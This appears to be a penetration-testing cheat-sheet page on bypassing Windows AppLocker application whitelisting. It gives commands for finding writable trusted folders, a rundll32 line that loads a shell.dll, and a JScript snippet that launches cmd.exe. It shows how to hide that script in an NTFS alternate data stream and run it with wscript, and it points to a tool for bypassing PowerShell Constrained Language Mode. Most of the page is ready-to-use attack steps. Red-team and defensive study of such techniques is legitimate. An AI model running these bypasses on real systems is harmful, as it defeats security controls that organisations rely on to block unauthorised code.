AppLocker

Trusted Folders

need administrator cmd

and tools from sysinternalsSuite

accesschk.exe "<current user>" C:\Windows -wus

icacls.exe C:\Windows\Tasks

copy the binary to allowed directory. then run that binary.

Bypass with DLL

rundll32 c:\windows\tasks\shell.dll,run

Alternate Data Stream

save this to shell.js

var manggo = new ActiveXObject("WScript.Shell");
var pineapple = manggo.Run("cmd.exe");

Find the TRUSTED FOLDER that able to W & X by current user

type shell.js > "<trusted directory with txt file>\file.txt:shell.js"
# verify the alternate data stream

dir /r "<file name>"
# file.txt:shell.js:$DATA

Execute the alternate data stream

wscript "<directory>\file.txt:shell.js"

Other technique

check third party script execution which is must be pre-installed in the compromised computer:

Python

Still Problem?

use this:

GitHub - calebstewart/bypass-clm: PowerShell Constrained Language Mode BypassGitHub

reference:

https://securitycafe.ro/2023/05/02/bypassing-application-whitelisting/

PreviousBypass All The Things NextMSBuild Shell

Last updated 1 year ago